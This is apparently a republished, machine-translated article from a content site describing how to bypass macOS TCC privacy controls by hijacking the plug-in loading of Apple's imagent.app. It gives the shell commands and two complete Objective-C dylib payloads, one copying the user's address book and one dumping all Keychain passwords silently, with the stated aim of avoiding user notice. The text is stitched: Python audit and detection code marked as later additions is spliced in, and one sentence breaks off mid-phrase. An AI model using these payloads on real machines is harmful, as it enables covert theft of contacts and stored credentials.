How to bypass the privacy control of macOS

2025-01-19 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)05/31 Report--

This article explains in detail how macOS privacy controls can be bypassed. The content is of high quality, so the editor shares it here as a reference; I hope you come away with a clear understanding of the relevant material after reading it.

Preface

As each new version of macOS introduces privacy or security updates, we need to use some useful techniques to browse and understand what changes Apple has made.

In late 2018, Apple released macOS Mojave and with it a privacy restriction mechanism designed to alert users when apps request access to sensitive data such as the camera, microphone, address book and calendars. A core goal of red team work is for the intrusion to go undetected, so we need to bypass these security controls so that users do not notice our activity; the last thing we want is for the system to pop up the following warning dialog:

We'll show you a technique for circumventing macOS privacy controls and other protective access restrictions, such as Keychain.

macOS Privacy Control Overview

I've been trying to figure out how to get around Mojave's privacy controls, and I've been thinking about how the operating system displays privacy alerts to users when third-party apps access features like calendars and address books. More importantly, I wondered how Apple-signed apps can access these features without asking for user consent.

All the answers I was looking for were in TCC. TCC stands for Transparency, Consent, and Control. Alongside the sandbox, TCC is responsible for monitoring program access requests and alerting users when restricted resources are requested.

We can look at the following behaviors:

ls ~/Library/Calendars

Unless you have previously allowed Terminal.app to access Calendar (you can reset the permission with the command "tccutil reset Calendar"), the following warning box will pop up:

After clicking "Don't Allow", you will see an error message for the denied request in the Console:

Check the Security & Privacy tab in the Control Panel and you will see:

Interestingly, Calendar.app itself does not appear in this configuration panel. When we inspect the entitlements of Calendar.app with the codesign tool, we see the following:

    com.apple.private.tcc.allow
        kTCCServiceReminders
        kTCCServiceCalendar
        kTCCServiceAddressBook

Here we see the entitlement com.apple.private.tcc.allow, which, when present, grants unprompted access to protected resources. Every resource the app needs to access must be listed under this entitlement; Calendar.app can therefore access reminders, calendars and the address book directly, and TCC shows the user no privacy prompt at all.

Unfortunately, we can't simply sign our own app with this entitlement, because entitlements in the com.apple.private namespace only work for Apple-signed binaries, so we need to find another way.

How?

Since macOS Mojave was released, there have been many posts on the web discussing this, most of which rely on using some way to control applications that are in the permission list, but we prefer to use other methods to execute code in the target application.

In this article, we'll focus on the imagent.app that ships with macOS, located at /System/Library/PrivateFrameworks/IMCore.framework/imagent.app. Looking at the app's entitlements, we find something very interesting. First, we see that it can access the address book without alerting the user:

    com.apple.private.tcc.allow.overridable
        kTCCServiceAddressBook

In addition, we can see that this application is able to access multiple Keychain access groups:

    keychain-access-groups
        ichat
        apple
        appleaccount
        InternetAccounts
        IMCore

Next, we use the codesign tool to check the code-signing flags associated with the binary:

codesign -d --entitlements :- /System/Library/PrivateFrameworks/IMCore.framework/imagent.app -vv

After running it, we see the embedded code signature metadata:

CodeDirectory v=20100 size=4066 flags=0x0(none) hashes=120+5 location=embedded

The flags to watch for when looking for a suitable proxy application are library-validation, which means that only dylibs signed by Apple or carrying the application's own team ID can be loaded, and runtime, which indicates the application uses the hardened runtime and therefore does not allow us to load arbitrary dylibs into the process.

If neither flag is present, we don't have to deal with these restrictions. Now you're probably thinking, "Can I just load my dylib with DYLD_INSERT_LIBRARIES?" ... well ... No! Apple certainly thought of this, and if you look at the source code at https://opensource.apple.com/source/dyld/dyld-655.1.1/src/dyld.cpp.auto.html, you

As you will see, any attempt to load a dylib through environment variables is blocked when the entitlement is present.
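The checks described above (signing flags plus the TCC and keychain entitlements) can be automated for reviewing any signed binary's hardening. The following is an added example, not code from the original article: it parses the combined text that "codesign -d --entitlements :- <bundle> -vv" prints; the SAMPLE string is constructed here from the imagent.app values quoted on this page, and the function names are my own.

```python
# Added example (not from the original article): summarise a binary's code-signing
# flags and TCC / keychain entitlements from codesign output, for hardening review.
import plistlib
import re

# Constructed sample mirroring the article's imagent.app output (flags line from
# -vv on stderr, entitlement plist from ":-" on stdout, concatenated).
SAMPLE = """Executable=/System/Library/PrivateFrameworks/IMCore.framework/imagent.app/Contents/MacOS/imagent
Identifier=com.apple.imagent
CodeDirectory v=20100 size=4066 flags=0x0(none) hashes=120+5 location=embedded
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>com.apple.private.tcc.allow.overridable</key>
  <array><string>kTCCServiceAddressBook</string></array>
  <key>keychain-access-groups</key>
  <array>
    <string>ichat</string><string>apple</string><string>appleaccount</string>
    <string>InternetAccounts</string><string>IMCore</string>
  </array>
</dict>
</plist>
"""

# codesign prints the CodeDirectory flags as "flags=0x12000(library-validation,runtime)"
FLAGS_RE = re.compile(r"^CodeDirectory .*?flags=0x[0-9a-fA-F]+\(([^)]*)\)", re.M)

def parse_codesign(text):
    """Return (set of flag names, entitlements dict) from codesign output text."""
    m = FLAGS_RE.search(text)
    names = m.group(1).split(",") if m else []
    flags = {n.strip() for n in names if n.strip() and n.strip() != "none"}
    start, end = text.find("<?xml"), text.find("</plist>")
    ents = {}
    if start != -1 and end != -1:
        ents = plistlib.loads(text[start:end + len("</plist>")].encode())
    return flags, ents

def audit(text):
    """Summarise the properties a reviewer cares about for a signed binary."""
    flags, ents = parse_codesign(text)
    return {
        "library_validation": "library-validation" in flags,
        "hardened_runtime": "runtime" in flags,
        "tcc_allow": list(ents.get("com.apple.private.tcc.allow", [])),
        "tcc_allow_overridable": list(ents.get("com.apple.private.tcc.allow.overridable", [])),
        "keychain_groups": list(ents.get("keychain-access-groups", [])),
        # Neither hardening flag set: the loader accepts code not signed by Apple.
        "missing_hardening": not (flags & {"library-validation", "runtime"}),
    }
```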

So what other options do we have? Looking at the structure of imagent.app, we see a PlugIns directory intended for loading extensions at runtime. Since our target application does not require signed dylibs, it should be possible to load arbitrary code into a signed process.

Next, we need to disassemble the binary and see how the PlugIns directory is used.

While looking for NSBundle references, we found the _loadServices method:

We can see the file extension that a plug-in bundle must have, and the bundle being loaded with the following function:

Next, we need to create a plug-in. Here I took an existing imservice plug-in and modified it directly; the plug-ins live under /System/Library/Messages/PlugIns.

After getting our plug-in, we can copy it to a writable path:

cp -r /System/Library/PrivateFrameworks/IMCore.framework /tmp/; cp -r /System/Library/Messages/PlugIns/iMessage.imservice /tmp/IMCore.framework/imagent.app/Contents/PlugIns/

Next we need to create the dylib to load. When building it, we use the __attribute__((constructor)) attribute so that our code runs as soon as the library is loaded, and the proxy application can then exit without ever showing the user a prompt. For example:

    #import <Foundation/Foundation.h>
    #include <stdio.h>
    #include <stdlib.h>

    @interface FunkyDylib : NSObject
    - (void)copyFilesFrom:(NSString *)src toPath:(NSString *)dst;
    @end

    @implementation FunkyDylib
    - (void)copyFilesFrom:(NSString *)src toPath:(NSString *)dst {
        NSFileManager *fileManager = [[NSFileManager alloc] init];
        [fileManager copyItemAtPath:src toPath:dst error:nil];
    }
    @end

    void runPOC(void) {
        // Copy the TCC-protected AddressBook directory out of the user's profile
        [[[FunkyDylib alloc] init] copyFilesFrom:@"/Users/xpn/Library/Application Support/AddressBook"
                                         toPath:@"/tmp/AddressBook"];
        NSLog(@"[*] Copy complete, check /tmp/AddressBook for data");
    }

    // Runs automatically when the dylib is loaded into the host process
    __attribute__((constructor))
    static void customConstructor(int argc, const char **argv) {
        printf("IMCore PlugIns hijack POC by @_xpn_\n\n");
        runPOC();
        exit(0);
    }

After compilation, we can directly replace the existing plugin dylib of iMessage.imservice:

cp -f funky.dylib /tmp/IMCore.framework/imagent.app/Contents/PlugIns/iMessage.imservice/Contents/MacOS/iMessage

Next, launch imagent:

/tmp/IMCore.framework/imagent.app/Contents/MacOS/imagent

If everything works, no warning box appears at this point, and the address book data is copied to /tmp:

Accessing the Keychain

Beyond the above, we can use the same technique elsewhere, for example with the Keychain access groups:

Next, we try to retrieve the user's Keychain credentials. For this we use the SecItemCopyMatching API to search for items and return all of their Keychain attributes, including the stored password:

    #import <Foundation/Foundation.h>
    #import <Security/Security.h>
    #include <stdio.h>
    #include <stdlib.h>

    @interface FunkyDylib : NSObject
    - (void)harvestKeychain;
    @end

    @implementation FunkyDylib
    - (void)harvestKeychain {
        // Match every generic-password item and return attributes plus secret data
        NSDictionary *query = @{
            (id)kSecClass: (id)kSecClassGenericPassword,
            (id)kSecReturnData: (id)kCFBooleanTrue,
            (id)kSecAttrSynchronizable: (id)kCFBooleanTrue,
            (id)kSecReturnAttributes: (id)kCFBooleanTrue,
            (id)kSecMatchLimit: (id)kSecMatchLimitAll
        };
        CFTypeRef result = NULL;
        OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &result);
        if (status != noErr) {
            printf("[!] Error with SecItemCopyMatching\n");
            return;
        }
        NSLog(@"[*] Dumping Wifi Creds from Keychain...\n\n");
        NSLog(@"%@", (__bridge id)result);
    }
    @end

    void runPOC(void) {
        [[[FunkyDylib alloc] init] harvestKeychain];
    }

    // Runs automatically when the dylib is loaded into the host process
    __attribute__((constructor))
    static void customConstructor(int argc, const char **argv) {
        printf("IMCore PlugIns hijack POC by @_xpn_\n\n");
        runPOC();
        exit(0);
    }

Copy the above and overwrite the iMessage plugin dylib created earlier, then launch imagent:
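Both variants above leave the same footprint: a copy of imagent run from a writable location, a plug-in loaded from that location, and a read of TCC-protected data. The following is an added example, not code from the original article, showing detection logic over constructed endpoint telemetry records (process exec, image load, file open); the event format, the PRIVILEGED_APPLE_BINARIES list and the /Users/alice paths are assumptions made for the example.

```python
# Added example (not from the original article): detection rules for the
# plug-in hijack above, run over constructed telemetry records.
import os

# Paths from which Apple system binaries legitimately execute (assumption).
SYSTEM_ROOTS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")

# Apple binaries the article shows carrying private TCC / keychain grants; a real
# deployment would derive this list from an entitlement audit (assumption).
PRIVILEGED_APPLE_BINARIES = {"imagent", "Calendar"}

# TCC-protected locations the article's payload reads.
PROTECTED_FRAGMENTS = ("/Library/Application Support/AddressBook", "/Library/Calendars")

def _is_system_path(path):
    return path.startswith(SYSTEM_ROOTS)

def detect(events):
    """Return a list of (rule, pid, path) alerts for the suspicious records."""
    alerts = []
    tracked = {}  # pid -> path of a privileged Apple binary running off-system
    for ev in events:
        kind, pid, path = ev["type"], ev["pid"], ev["path"]
        if kind == "exec":
            # Rule 1: a privileged Apple binary executing from a copy outside the
            # system volume (the article launches imagent from /tmp).
            if os.path.basename(path) in PRIVILEGED_APPLE_BINARIES and not _is_system_path(path):
                tracked[pid] = path
                alerts.append(("apple-binary-off-system", pid, path))
        elif kind == "load" and pid in tracked and not _is_system_path(path):
            # Rule 2: that process loads a plug-in/dylib from a writable path.
            alerts.append(("off-system-plugin-load", pid, path))
        elif kind == "open" and pid in tracked and any(f in path for f in PROTECTED_FRAGMENTS):
            # Rule 3: it then reads TCC-protected data without any prompt.
            alerts.append(("tcc-data-access-from-hijacked-process", pid, path))
    return alerts

# Constructed sample telemetry: the legitimate daemon, then the article's steps.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 501, "path": "/System/Library/PrivateFrameworks/IMCore.framework/imagent.app/Contents/MacOS/imagent"},
    {"type": "load", "pid": 501, "path": "/System/Library/Messages/PlugIns/iMessage.imservice/Contents/MacOS/iMessage"},
    {"type": "exec", "pid": 777, "path": "/tmp/IMCore.framework/imagent.app/Contents/MacOS/imagent"},
    {"type": "load", "pid": 777, "path": "/tmp/IMCore.framework/imagent.app/Contents/PlugIns/iMessage.imservice/Contents/MacOS/iMessage"},
    {"type": "open", "pid": 777, "path": "/Users/alice/Library/Application Support/AddressBook"},
]
```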

That concludes this article on bypassing macOS privacy controls. I hope the above content is of some help and that you can learn more from it. If you found the article good, please share it so that more people can see it.


© 2024 shulou.com SLNews company. All rights reserved.